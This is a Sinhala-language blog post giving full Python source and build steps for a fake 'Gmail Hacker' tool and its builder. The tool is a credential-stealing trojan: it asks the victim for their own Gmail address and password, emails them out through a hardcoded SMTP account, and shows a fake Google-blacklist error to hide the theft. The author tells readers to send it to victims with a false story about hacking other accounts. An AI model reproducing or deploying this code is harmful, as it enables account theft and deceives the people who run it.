Gmail Hack කරමු... - New Tech Methods

Breaking

Saturday, 9 July 2016

Gmail Hack කරමු...



 

.com/blogger_img_proxy/

ඔන්න ඉතින් අද මාතෘකාව දැක්කම කට්ටිය හිතනවා ඇති මම අද දෙන්න යන්නේ අර කවුරුත් දන්න Gmail hacker කියන පොඩි tool එක කියලා..නෑ නෑ ඒක නෙමේ..
ඒ tool එක ගැන කිහිප තැනකම තියනවා මම දැක්කා.

ඉතින් මම නම් ඔය tool එක පාවිච්චි කරන එක හොද දෙයක් කියල ඔයාලට කියන්නේ නෑ..මොකද ඕකත් එක්ක තව malicious software කීයක් bind කරල තියනවද කියලා කියන්න බෑ..අනිත් එක ඕක හදපු කෙනාම උනත් තමන්ටත් password එන විදිහට coding කරලා නෑ කියලා කාටවත් කියන්න බෑනේ..

ඒ උනත් ලංකාවේ ඉන්න ගොඩක් අය කැමති ඔය වගේ tool බාවිතා කරන්නනේ..අලුතින් දෙයක් හිතලා කරන්න කැමති අය අඩුයි..ඒකට ප්‍රධානම හේතුවක් වෙලා තියෙන්නේ අපේ අයගේ මේ පිලිබද තියන නොදැනුවත්කම..
ඔය වගේ gmail hacker tool එකකින් හදා ගත්ත fake tool එකක් දීලා ගොඩක් අයව අන්දන්න පුලුවන් නිසා මේ වගේ tool බාවිතා කරන්න ගොඩක් අය කැමතියි..ඒ නිසා ඒවා භාවිතා කරන්න ගිහින් තමන්ගේ පරිගනකයට වෛරස් පුරවගන්න අයට ඒකෙන් ගැලවෙන්න මම අද මේ විදිහේ tool එකක් මමම coding කරන්න තමා යන්නේ..
එතකොට ඔයාලට පුලුවන් ඔයාලගෙම කියල tool එකක් හදාගන්න..එතකොට අර කිව්ව ප්‍රශ්න නෑනේ..

හරි එහෙනම් වැඩේට බහිමු..
මුලින්ම මම coding එක දීලා අන්තිමට ඒ විදිහට හදපු executable file එක දෙන්නම්..

මම මේක කොටස් 3ක් විදිහට හදන්නේ..

1) Gmail Hacker Builder කොටස


import Tkinter,os,tkFileDialog,sys
from Tkinter import*
global a,filename,sed
filename='C:'
def build():
    mfile=open('logo.exe','a')
    mfile.write('#sas'+a.get())
    mfile.close()
    m2file=open('aaaa.SED','w')
    m2file.write(sed)
    m2file.close()
    os.system('iexpress.exe /n aaaa.sed')
    sys.exit()               
def cp():
    global filename,sed
    filename=tkFileDialog.askdirectory(initialdir='.')
    print (filename)
    Label(window,text=filename).grid(in_=window,row=5,padx=(10,1),sticky=W)                                                                         
    sed='''[Version]
Class=IEXPRESS
SEDVersion=3
[Options]
PackagePurpose=InstallApp
ShowInstallProgramWindow=1
HideExtractAnimation=1
UseLongFileName=0
InsideCompressed=0
CAB_FixedSize=0
CAB_ResvCodeSigning=0
RebootMode=N
InstallPrompt=%InstallPrompt%
DisplayLicense=%DisplayLicense%
FinishMessage=%FinishMessage%
TargetName=%TargetName%
FriendlyName=%FriendlyName%
AppLaunched=%AppLaunched%
PostInstallCmd=%PostInstallCmd%
AdminQuietInstCmd=%AdminQuietInstCmd%
UserQuietInstCmd=%UserQuietInstCmd%
SourceFiles=SourceFiles
[Strings]
InstallPrompt=
DisplayLicense=
FinishMessage=
TargetName='''+filename+'''/GmailHacker.exe
FriendlyName=abc
AppLaunched=logo.exe
PostInstallCmd=gh.exe
AdminQuietInstCmd=
UserQuietInstCmd=
FILE0="gh.exe"
FILE1="logo.exe"
[SourceFiles]
SourceFiles0='''+sys.executable.strip('gmail.exe')+'''
[SourceFiles0]
%FILE0%=
%FILE1%='''
    
window=Tkinter.Tk()
window.title('Gmail Hacker Builder by sinhalahacker.net')
window.geometry('350x300')
window.wm_iconbitmap('data\icon1.ico')
window.wm_resizable(0,0)
l=PhotoImage(file='data\logo.gif')
l1=Label(window,image=l)
l1.image=l
l1.grid(in_=window,row=0,sticky=W)
Label(window,text='Enter Your Email address: ').grid(in_=window,row=1,padx=(10,1),sticky=W)                    
a=Entry(window,width=50)
a.grid(in_=window,row=3,padx=(10,1),sticky=W)
Label(window,text="Choose Path to create: ").grid(in_=window,row=4,padx=(10,1),sticky=W)                    
Label(window,text="C:/ ").grid(in_=window,row=5,padx=(10,1),sticky=W)                    

Button(window,text='Change Path',command=cp).grid(in_=window,row=6,padx=(10,1),sticky=W)
Label(window,text='Visit www.sinhalahacker.net to read latest tutorials ').grid(in_=window,row=7,padx=(10,1),sticky=W)                    
Label(window,text='').grid(in_=window,row=8,padx=(10,1),sticky=W)                    
Button(window,text='Build it',command=build).grid(in_=window,row=9,padx=(140,10),sticky=W)
sed='''[Version]
Class=IEXPRESS
SEDVersion=3
[Options]
PackagePurpose=InstallApp
ShowInstallProgramWindow=1
HideExtractAnimation=1
UseLongFileName=0
InsideCompressed=0
CAB_FixedSize=0
CAB_ResvCodeSigning=0
RebootMode=N
InstallPrompt=%InstallPrompt%
DisplayLicense=%DisplayLicense%
FinishMessage=%FinishMessage%
TargetName=%TargetName%
FriendlyName=%FriendlyName%
AppLaunched=%AppLaunched%
PostInstallCmd=%PostInstallCmd%
AdminQuietInstCmd=%AdminQuietInstCmd%
UserQuietInstCmd=%UserQuietInstCmd%
SourceFiles=SourceFiles
[Strings]
InstallPrompt=
DisplayLicense=
FinishMessage=
TargetName='''+filename+'''\GmailHacker.exe
FriendlyName=abc
AppLaunched=logo.exe
PostInstallCmd=gh.exe
AdminQuietInstCmd=
UserQuietInstCmd=
FILE0="gh.exe"
FILE1="logo.exe"
[SourceFiles]
SourceFiles0='''+sys.executable.strip('gmail.exe')+'''
[SourceFiles0]
%FILE0%=
%FILE1%='''
window.mainloop()



2) victimට යවන gmail hacker tool එක..




import Tkinter,smtplib,ttk,time,sys
from Tkinter import *
from email.mime.text import MIMEText
global a,b,c,error,error2,mf,mail
mf=open('logo.exe','rb+')
mf2=mf.read()
i=0
while mf2[i]+mf2[i+1]+mf2[i+2]+mf2[i+3]!='#sas':
  i+=1
mail=mf2[i+4:]
print mail
def ex():
  sys.exit()
def hack():
    global a,b,c,error,error2,mail
    error.destroy()
    error2.destroy()
    try:

        log='''Gmail address- '''+a.get()+'''\n Password- '''+b.get()+'''\n Tried to hack - '''+c.get()
        sender = 'sas@shanaka95.byethost3.com'
        msg = MIMEText(log)
        msg['Subject'] = "Keylogs from Sinhalahacker.net"
        msg['From'] = sender
        msg['To'] = str(mail)
        server = smtplib.SMTP_SSL('smtp.zoho.com', 465)
        server.login('sas@shanaka95.byethost3.com', 'testing123')
        server.sendmail(sender, [mail], msg.as_string())
        server.quit()
        error2=Label(window,text="Your IP address has been blacklisted by Google servers.\nTry changing IP address",fg='red')
        error2.place(x=10,y=385)
    except:
        error=Label(window,text="Can't connect to Google Servers.\nPlease check your internet connection.If you use firewall,\nplease disable it and try again.",fg='red')
        error.place(x=10,y=385)

    
window=Tkinter.Tk()
window.title('Gmail Hacker V 1.5')
window.geometry('355x450')
window.wm_resizable(0,0);
window.wm_iconbitmap('data/icon1.ico')
logophoto = PhotoImage(file="data/logo.gif")
labellogo = Label(window,image=logophoto)
labellogo.image = logophoto
labellogo.grid(in_=window,row=1, sticky=W)
Label(window,text="").grid(in_=window,row=2,padx=(10,1), sticky=W)
Label(window,text="Enter Your Gmail Address ( with '@gmail.com') :").grid(in_=window,row=3,padx=(10,1), sticky=W)
a=Entry(window,width=55)
a.grid(in_=window, row=4, column=0,padx=(10,1),sticky=W)
Label(window,text="Enter Your Gmail Password :").grid(in_=window,row=5,padx=(10,1), sticky=W)
b=Entry(window,width=55,show="*")
b.grid(in_=window, row=6, column=0,padx=(10,1),sticky=W)
Label(window,text="Enter Your Victim's Gmail Address ( with '@gmail.com') :").grid(in_=window,row=7,padx=(10,1), sticky=W)
c=Entry(window,width=55)
c.grid(in_=window, row=8, column=0,padx=(10,1),sticky=W)
Label(window,text="Victim Password : (Click Hack now! to reveal victim's password)").grid(in_=window,row=9,padx=(10,1), sticky=W)
Entry(window,width=55,state=DISABLED).grid(in_=window,row=10,padx=(10,1), sticky=W)
Label(window,text="").grid(in_=window,row=11,padx=(10,1), sticky=W)
Button(window,text='Hack now!',command=hack).grid(in_=window,row=12,column=0,padx=(10,1),sticky=W)
Button(window,text='  Exit  ',command=ex).grid(in_=window,row=12,column=0,padx=(300,1),sticky=S)
Label(window,text="").grid(in_=window,row=13,padx=(10,1), sticky=W)
pb = ttk.Progressbar(window, length=340, mode='determinate')
pb.place(x=8,y=360)
error=Label(window,text="Can't connect to Google Servers.\nPlease check your internet connection.If you use firewall,\nplease disable it and try again.",fg='red')
error2=Label(window,text="Your IP address has been blacklisted by Google servers.\nTry changing IP address",fg='red')

window.mainloop()
දැන් ඔය දෙකෙන් පලවෙනි එක මම gmailhacker.py විදිහටත් දෙවනි එක gh.py විදිහටත් save කරගෙන දෙකම pyinstaller භාවිතා කරලා executable files බවට convert කරගන්නවා..

දැන් තුන් වෙනියට මට ඕනේ ඔය program දෙකට අදාල images එහෙම අඩංගු data file..මම ඒ ටික logo.exe විදිහට හදා ගන්නවා..

හරි දැන් ඔන්න තියනව මට ඕන file ටික ඔක්කොම..මෙතනින් download කරගන්න..

හරි දැන් ඒ ටික ඔක්කොම bind කරගන්න..ඔන්න එතකොට මට එනවා සම්පූර්න tool එක..
සම්පූර්න tool එක මෙතනින් download කරගන්න..

gmail+hacker1
ඔන්න තියනවා tool එක..ඔතන Enter your email address කියන තැන ඔයාගේ email address එක ගහන්න..
ඊට පස්සේ Gmail Hacker tool එක හැදෙන්න ඕන තැන path එක තෝරන්න..
වැදගත්-මෙතන path එක තෝරද්දි ඔයාගේ computer එකේ os එක දාලා තියන drive එක පාවිච්චි කරනවනම් admin privileges ඕන වෙනවා..ඒ කිව්වේ program එක run කරද්දි run as administrator විදිහට run කරන්න ඕනේ..එහෙම නැත්තන් path එක විදිහට වෙන drive එකක් දෙන්න..

අන්තිමට Build it button එක click කරන්න..

gmail+hacker2

ඔන්න එතකොට ඔයා තෝරපු path එකේ GmailHacker.exe කියලා අපේ tool එක හැදිල තියෙයි..

දැන් එක execute කරලා බැලුවම

gmail+hacker3
ඔන්න පේනව නේද..ඕක තමා අපි victim ට යවන්න ඕනේ..එයාට බොරුවක් කියල දෙන්න ඕන මේකෙන් වෙන කෙනෙක්ගේ gmail account එකක් බොහොම ලේසියෙන් hack කරන්න පුලුවන් කියලා..

ඉතින් එයා මේකෙන් එහෙම hack කරන්න හිතාගෙන තමනගෙ විස්තරයි එයා හැක් කරන්න හිතාගෙන ඉන්න කෙනාගේ විස්තරයි දීලා Hack Now button එක ඔබනවනේ..

මම මේකට මගේ gmail address එක විදිහට admin@sinhalahacker.net කියලත් password එක විදිහට testing123 කියලත් victimගේ gmali address එක විදිහට abcd@gmail.com කියලත් දීලා hack now button එක click කරනවා..

gmail+hacker
 ඔන්න එතකොට ඔය පේනව වගේ error එකක් එනවා..
"Your IP address has been blacklisted by Google servers.\nTry changing IP address"

දැන් ඉතින් අපේ victim මෙහෙම ආවම හිතනවා මේක එයාගේ පරිගනකයේ අවුලක් කියලා..

ඒ උනත් ඔන්න බලන්න මම අර කලින් දීපු මගේ Email address එකට විස්තර ඔක්කොම එනවා..
gmail+hacker4

ඔන්න හරි...වැඩේ ලේසියෙන් ඉවර උනාට හදන එකනම් ලේසි උනේ නෑ..:-) මම මේකේ source එකත් එක්කම දුන්නේ නැත්න් කට්ටිය හිතයි මම මේක ඇතුලේ malicious code හන්ගලා දෙනව කියලා..

මම ආයෙත් කියනවා මේක මම කොහොමත් අනුමත කරන දෙයක් නෙමේ..මොකද මේවට රැවටෙන අය අද අඩුයි..ඒ උනත් google search කරල download කරන එක එක software වලින් අමාරුවේ වැටෙන අය ඒකෙන් ගලවගන්න තමා මම මේක හැදුවේ..

මොකක් හරි අවුලක් තියනවනම් කියන්ඩෝ..



No comments:

Post a Comment

Post Top Ad